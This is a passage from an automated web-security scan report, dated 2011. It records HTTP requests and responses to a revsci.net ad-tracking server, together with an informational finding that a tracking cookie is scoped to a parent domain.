rsiPus_0W9M="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEldrjeS1EvCK92NakAmHiwdDZ+f+xJ0P6g2Xcb+zvdOQtDOR/YNlY1Z7I2MakMEO8YvDy8zYq2qzY9fRQF0eHWbAbjLpsJ4nHYPIDY8CjI0NuQPRrJ63AJGM98tN8nxyyOfQwtHPfJ2HR1/eiCA/DICiFWmuHq8SwyKKtsnNk9a6eAFHAVH99uaVWoVPCro9psXBPlW40ljeYvl4jgYQeCuHGv9xHKPsEMaIn9KOnJqOmRZNsPWFTuFujsev8eLkINvZ5ldHB/MaLF8y3r76EzCHZBqMNp2qyKaCYEDJHvLb3DNlWRr6nzIKHnlhGaKdz7Ld4vSAKjA9vJdlQbp1mBKAwR6nqt9Dm41SoVvAqtc21pGzBq1Kbspi94yny81egfDOLKz2Pk1v9pRZ02sx7Ior1ko/2jRO+qZud2DZQefAbCAWvZFgrrJIfNinEanzwS8IlE4i66rSr3RlUzqoyZKeprEi0UEYgWWEGNldQ/avHT5mUMdApyWiite5qDMZkj/TtCVsYmFEVz0rM0gzM3hjYnFrfoeMizRnnIIq9ftZ3dHnKEHa5J8Pj+VCddLYQEgDdUA9KDGpwuQz/tYXzHPnVVJMVdjtlWqCkfZ/9zHY52Vb/UVpgoaqnUJJ64O8k2/OGieBzfGYcmk6UgZXuVfHxbGi0ZwZ5Eqe5BVy7NLNJws6F9J8MWz73nAcWGe6NPmtZ2Bsgr1MMyks/eB9CrmAl4jPmARSdYMK1yxjStco5syb/kbnczkiqKAwLmCJW7u2pCZhqL3dDS4thEgOLkd+qXYwCuetAKCLsz8ho0Db4FzMIt8gbHrksuOwVSuYNda1IeqpZVmF1g8+pG++u38WnJ5+zEQXPANXYK4L+DBMaNGkKrLVNZEMzqPisu0S9AiQ1eccy6xWHkkstE2ArWpIFqrN1Eiy1A6ddzQmolpsPWkNM8Mu4yQyCNa5JV/B3jgNxaVLwwDhuRGhzan/htoVD03kC2JEACv5YlFk6yskc9Yf4pdgm4djTKZP0DsNckxEXmEUPmCr4AWsuscbmHStm77IEQLvGokIsdEslulzNgMkkHIOhK0sfmoGpEUWULW2kfR7uEefFxJalE6i9BKwn4cTzBCXhxsDIaZgeWTZGVOB0UW57YdZvwCQ+ZbiUy8yrq9UaeZcH4DF5j7qpquEdbB72qaKIpmwg8WnR87Xr+BAF1MmJf9UA86Ka4+agZY/DQr1KOwdvX/Pjsu4T0g80zZssOfj7Ij3xv8QCQOeZQnf8b9SbIor4T1LXXRKpdSjikgtRdac/gWyL4S/uY+COXYC0Aw1o="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJaTlb+xXy69xbJ/0QVdsYVA+jAwDuBibDVYdgkxR17eXa39ci7b7ap0/4eGEAxl+9jnQjUkNsyCt7dKiPSIuUbx737weL8D8Lst4ZfJUhERKnsjHtyxiXTlKa080FLG1wA2PlULpyvcZq9IqvpxPKk0YhA44L1Nso5MlBHEE/wCH/Y1ZbonZH/Q/zyE8HVAttnFQDhwQDENSCazWB7wG3+nXmKGz1tGi3KgcXMk69GFHTPtbI66LLO6/EGpE8JkAfFVU7Wqivfeadr8/Ww5QjsxmUZaCaOBMsj/pKMYY19cv1vgabTZrsCrWWbMOyoj7FcTE8HCFSpfupUmau2l1G5biflRKPtNwe1SwX+z+RBnmM9CjaeWPliWcBDQa18RWX3yZeY3gySFQ1eKnUQrICNxGFzKfFsvgYv+73kF/irw1h5eL/A82E5bXjypUxBxV164olmaCDUtqt8RO3TRoP8vMdAmnsLppW7tUF6e1Jyi2flYa6o3hHeqtx20U+VBlIe9XsAKBHDlfz96j30NW5/jEAzU8SFNib/36F91+H3Iulx8WsxADVnV52ZmIaToZG6a4wzcwx6cLSe2deVIfTWAA/KDWxmpqDdrSt+DVacaUiHfChJcaPLv+hgEdO7m3BGEGHDn5nCitO5D+ENDKGHC0ldbR3dMxEsNH1nBwxS09v7AVfSdops8+z14f70yRCVUJ7iFSVOCm2whhQEXXghZL3lffkwRwHY6wlVwIfck1hjNu8yhtrKWBHF3k0AbygNTzvKCajebu1PfBwp1In4wWIXgA1pmTdRogcsIYnFo7yLpsyMNGfE8Ip4+oQrTcInN0WjO2jXyWwyQwZE2rIbfvjOvb481eCRnwbZWxyvkXz75cMMmFpXT1Q5/CyjfQZAZQRbw+WlmDaaTWMNXyBK85YvV4BteMqp4K77RnlFShNbO5MCP6SiIa9BuMK3tdaLo991hZodc4VMvc2OaQLQbUEFBqtWU8ntUiot84oWLbBJldBEgNBFbtBvbTPdZvxMwrFIz+5DadY578mP9flA4ceRzezB5uSvKzTyaJygydmXQirfP+Zmum1Mtnk86G76zxwvg1mXBplUMhmPGATeDCcLZ/bZQbjh5FRNzucZSyfnDBViNquVzCBWzwdkbOXu1fGaT6m0os3oWgvkpsTJEnSJ6tSZMW8cG6Yuj8sV+wmCNC5YLJPUZtX8KGdmF4Z6tnMoKDchKuJDydhC7bAEIMbxqbO9k3IIo/rbwWdeYzqIMsvWK9G65Kex5/JLnTEBnPvdRiGLQvTOwT9Pu/UKsk4mDWvj/g2sL6S7YFFQDjRrmFvFL6GohnjktARmBwfaJq1//nBFKLC4cegap/xVp+D8o08THYo/ZGAfDjTmzmArF/2Q6+y8vge1aUliti28gLnzk3kBPlzuawhJC6wjxTS3/1nQFtU0b2MhqHtFNHjGKnwhja2Etch3bOknRC67MBxZa01siQfHHT+9ef+BR61uhD+FIYGzM0vTRzHvuCHoJS/6sIvA3fsBIKeDGyfjVWrxPWgNRgWRGqohvCepa01YXrikKfHSfeqYN3DOsPiJcNd+/BESFxiibEY9fdTfj77ozqGcaidSxGkEmeLzNFETPLxp3JTGKodmaS6Nja/KeBRPBfEVEDEajtMM+wVkSR8yJrnK0PBML/qOaZnNI4TEWA/JSpfTJw05HWyT4VU/j+WWv6ZUBlXpSWUZlei9Uw4VRSnW6iq9FBQb+Z8NSS4X94UyRJiX4a95Vo="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhJtAtAulshuQUoryC/72YVV3KnFUpGzIzOVQ/bIXiPDsobwgeTiHIbVEyGEGPHgaQ7YHhSf2bhZV+UqL/Do82pu9Im93gZqdiixFhyKmptvGBrpMrZtIO4AaYCvDD73BW0osMpFavMqo5J9sHDmfho5CCaiPki8G6RkJN/P7Z4/a3dEObl3hB+eVbSso4eb8QcHfuHDIUKTQIwCU73at7EMJ47Pz9DJICab9bP7wogE6qz6m/ZYXUwoYUh93xf1tQIKle0HNk3QJHP1mY95wdA1d0Jbmgg6F7kNmCn/Sqd0K+PP7YT8wKPGntY/HXulrcJsVONCoAKTpfUMIzmKBA6wdy6OJgUdku+6ER8T/Dt1303DOGGvIUn14AOaF7uBEA4TRkyCUG+csGYDL9yKWmWfKZw3xURXR/+6UUHLQMPu3xKXiOFEWu8V1WQZBCmob0zPrRCu6zhU

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLS+N2tYOPb7H7ylEiZki5tHLRQw4mVwn8auJCEmHJ3qgLOl1PDKKRoQc/UBmorHEc/TIHBCVRVSZrobvtLMxEgZPYynL0er8BWtYtV0dJ53KZo9p/px9SgRp/FzXhLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXCa526djlE801fgUQBozQLnN1pbn0BVzaKGWpJbKR4+rCv9Jg3W1uFamSDB2IRqxAc8a9cD4KfEOirCQjLCYkPuN/9svloFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:32:37 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:32:36 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.164. http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/541993060.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFJEOhuQIMl594t637QLtKTShEEKPJgKWhVTM46g7k86fOUpoPyGpQqGmcAHhFlCRHJGrM+4CmMoLwQLoTCqr3r5XW6u03GkRNJjXLei6plrNgyTAAsKikEDJN/pB8U+M+b3xP8ojR3+OZiCn0i2H77rUVjAauYFVUKFcsYrxeWij6nJgx3+Gf1WrB8lgxYfycBUfr+CXUks1meFbpP4az8/adW8e49o2vd1ny0p4awJ64X0qjMWasPQO0EJBML5McgVuwLcgO6T5+9Nlp1mTNSdYYZBGGmwu8b5LKBMMmLdsD3BytbCGmRwoYJXospn2+QD5OY3P63/qDVLCvOIi9f3QBnZ+mHYyYVcngr+NnGKxjmjMvhro31bsmykCXUEuEgK1HseeR9BjchOMl6eN6J1A67kb9UDRgZ0j1gYja1H29543tuAXbNSRPV8z+qvXkRxwH+thAuFL3oQkGd6o7UHM40i6g5gjPpGzkICQ6X/a6ftJ3kQWadfhcierQ3j1ZFK11BQtk1eaIciNu35/SMCnk+27YhTfShegD4cH961OlnmdDbHYFIhT8n08zlVRclWf901wWSDLYIr/mEr3o0mJoTh3rUErWzu3HXRvpemu6RBDsGcUcVGcv5hUjDSWIjbJZ/pJrkdAaCRetuood49LBYp0w; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:14:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/541993060.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_KhAH="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMKplM1SF6IV/GkJfNayZZbgCtJgctB0UWg8IjB3Yl514EPJ4urcf4As6hj1VY7tYYI8RaaBaN6U+uIyenKXXMFkN8vM1Z/lS6m4eQU7/IgsjcH4XVeI4P9Y77AuTKDrWcZ732nqrTu+f1afqfqB1jT/jpW4WvhwJyVQqHVPVqJW58rpfyLsdoWH//H4d4ctxMc1GmbnAa0rS7gK0Z6pBnwLQI+1A4XIwESUW5uqmRZNsPSFTuFlSVbxEOgu8kySE4QoWxhmljw0p5SWuXT+xr/d4A8D9ghBEBqKsUYIiY1wGpk9swbfbUiT7xK1bXdQ3KplN1CZ/E/GEKB0fqACsPD6Th8ArvFxnZDLXk03vwMsIZLJOIL63Ph3/eEjMbmqeAaR5Lo4RreUWaFv8Sii2nEhuLuWzvrlVD+mb2Y2oS1xt01QkL5WFAioJ2VBbJ5sHBlnXsjsNBbvQR3bZhwd6dcYCNcUGVL9Onw7KW1nUNkvdUiDw7PodNW4fF/r29PicMWtdiajzdErn7jjY+HY+umcmBiPTiXCvh5fxSyCvNanScxRA+yzgogo2W0tYByjiIb08+G9MHHYARsRu+rReMMlWoKBxI+vQe8KAp+iem2Dx4WqAmWBqewzkvG/g4XBqHoQZ2uvaO18iKcZxwUYB8HBwQ3ZJhmZ71bO5f1rPoE5XPb2LUw2tcaj7UYZP2lFnIEcuHOFT/7yeuy6edLoSKydLUCHPJWcgLU5CAvKtOewKwc2dVART8DMnj73iJuEI/Vr1P1MGz6/RKsuakN1pOdpMAULKlukUM7bdTpZlEqjULDS/5ey1S+tjsZRe5lkhpREL5mDrYOqm0JXlsU4RW71BA81XmQ/tsxo18o8ce1SyylBJFAEvXHcq4jQN+b1jqpbRV3fYwAjM6VYfhI29zTkA/BvRDf5z4cga+m1TcgdmuRe5FAXzHsKcMdenaJFcafviAySlc2AUYnsPiZLQMoRZdjyBEUEqqIGrbCMFJqUl7ZnZg0SEsy/ipeTHvQPNGQ2vma+ZjSH/n1I65LgeSE56krtukhyo4J8PGhT5PYmtLyLrkXy6jKuOxv+uTRcIUAb5iQ7PWdNb5s6ElPLO2OHdBNtOt7zXJW1qOlrqEMLKQoJT/d9l569xpsarR3ydJRCFOfcYuMckpkZ1yV1z+9ltlxAhwSanGKkHoFbADefao/fA+f/ySvc4e3ZSCEvHRg/ro3JbdzrvHRwYvN8Hw8RVzSzGOwvQyfrN3ZhatyTzzgnEFBzDsSGujQtVdLUCBt0njxlMqKQ2LyqiaKP8X+pOXZQ=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NH/UTjJLypNPMu8j89fd7oQaFd0CGE6g8BwU8BLTkNk43VN7eq0QNSW3IUkuqTvqu8auJ2S2LZxpSpL8eGphT60G4prqTuDg4v2Zb/yvc7MWhplYIlsnHpOPYKY0IEvT3PlUlUEGoSac9AQESS351PhIB+LXkTVw+yOlPLcwWesXXhJmhvE4SCdz93oDt4M1tvZmoD+mheqRvM8GYiTs7PthOlA/7twJNlsBBwOEcTbIZs7hZysxqmkgfyHSO6UjOnkbJvli/uW8q6xOaWvvTung+4wYAWHmo2djEIeA/LD83M539uNFLC8jCa/SO7psLGktaFG+RjjFz4ymMhK0SsjdFfLbBfUs0oZu5yWqNbU9yOOXYIB1wo+bL169eF4cp5T33/P/8l3SU0RILcjJ8N/CKBKGb08uT55FXdlPhvAW7U0Qsf08f63RTM3sVbd3818CV2K5Cm6mwaIon8RUvVdfbZSYWzHLZAK5UUrce6j2T85hGfuilfxuv24y1e9jWnKLAFXtGNKaRrRLTqwb70+d8grBW1yfB8cT4z84z8Sgj7edmsUsMbrLvgsB9WF5ocgmAB223/BXPCf0lE/pofFLYYzSwMBDDLeIJ+myPTWP12UajXJQXKV6k+ttnjvWc/jqvNB7QNbBT3g3gKOwtE+eO7/YrNSuD6fJ6V/6j0tNTKi/cwZkR5/Muw7DQbQWdFi8i2R73pvR2aPAjdimV11S3dH6+MUkyoSl2dc4VVYFaQJGdyKG65/uRAb0Wt7qYtVq/UbY/5UXUOWeMlnO8R2pjouXfifMN15G6c0xW3ncYjDxRfiAeIqGD9nhLGAXGtZAzd/dhWRuwy7lqUePc991uElPgbBfspxc+h6d7KM0cIf8JYfbJ9Mw0NfcwDuyQjr7uHg0bLI3O/tGlYuQOw4fy7sVleDRz7hc/iYaG8lGnhGS39lK+MIFAJH0bmt1YH9Xy60dbgSWGwrySLiRCYOHAGO9D8PaTQNVx3dEx3k9fPfPKLOfk0/IdRLcBdB8AG2aH8xxj/P5aAloZRgyYxBp2MjcixmZY9+5m6JL2/LVsbDfOiRqRNOM6BIiwIoTRvi4BAcylBc2vVCJUGM5jGZnr4Nzzdmzcfi3mUs4/A26xde2RDS/Maf3Ia6pf5KXfdkN1XR1RWNZFV+LUu7Uxmyo9uKdVbvjkBbOpxR0RIaCsJSPky5WjGZEhCvi6xTtBF/5IbYDvU1YCPzWvvqOTyOZrYxDA8cntdZMF2n5YqPsTsxaSehAn3KaR/dXTHHNuuemj69mFlNRSsmT031UKoY0x8JsSkEQrNu5tkC0zQDfLm9ULLpBIutxC99IIv6ftrTpcyvl3lRf1lOMDpIXBianiJYXm1MOZ4X9aC78xe91pXhFRgiE5E/BpF5tK+StSu9MigTtHfnbwnHvSJi6TY61JfgUVrpxxlegdgnbovL3MSLfoIhqdgdcTdqA/BsZizgTO+1vETUHG3xsqedCL0FUg7qxiPKfVhiF9YjDOnrIz5P9uggoO5nSnxu0fSjQ8xbsnGyE7FV3qRaDBoJOyDd3wrq1kZjkpE9HD/XpbpQJtZfiPXxHh2VPVE0aosR5ovn7cz/3H/Ovgi+2uOkef6GCS4l35INn1OgHNbHai5k8uhzq6OodHkIRiMdSGvMW8seCW8CDM7YvP6I6nwZegPpWQrOH1O0hXDBqdw+mmrRMAMRMYy0vBPRO0Vn7HdK5piUqR8CnXSMunLCuVDouXJl0xZdAtZzHgbgole4l+m5Rw="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhnALDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VbmRbm1Bo6HLAj5TEabvehT6vuj41246c95NOaRAsl5hE/RALN8jDKWdYOCQ7hjL6yZdj93XkHvxvY5dXdsfw5hXREUnkNpOfzY0InwMUnQLl51r6hghZn7gauVHoMvNGFFuAmRJYN5sV/1/nbeNEDWJttW7cA/t9G7oqiGYornVEiz3mSs4Rr4srvtD5JXq4QuHnykUIj14KcafXascItPa4vG5ZyKeOUeIm+24UorEUdjW2jm9Ig2XraLHnyaRxT49Mtc69HF9219G89Xafz4V3V1GR/coyY9PJ+ReEhb3PpNUVHB1RfiQtXYM7UGwnW98N04uzWDgjPJKBamTv0wNMnP3VLKbYQckiar8IaWRIPZ0zFIjxqnb3Ze6OFtN5akmFmb8ilSj6iSOHYRk7u7LyZ9TiE7e99T7py6b2TBwxEMX29eM3EmSWxGXfP+hvPTRUn2Cx+2Rfo2ZYNNg=

Response

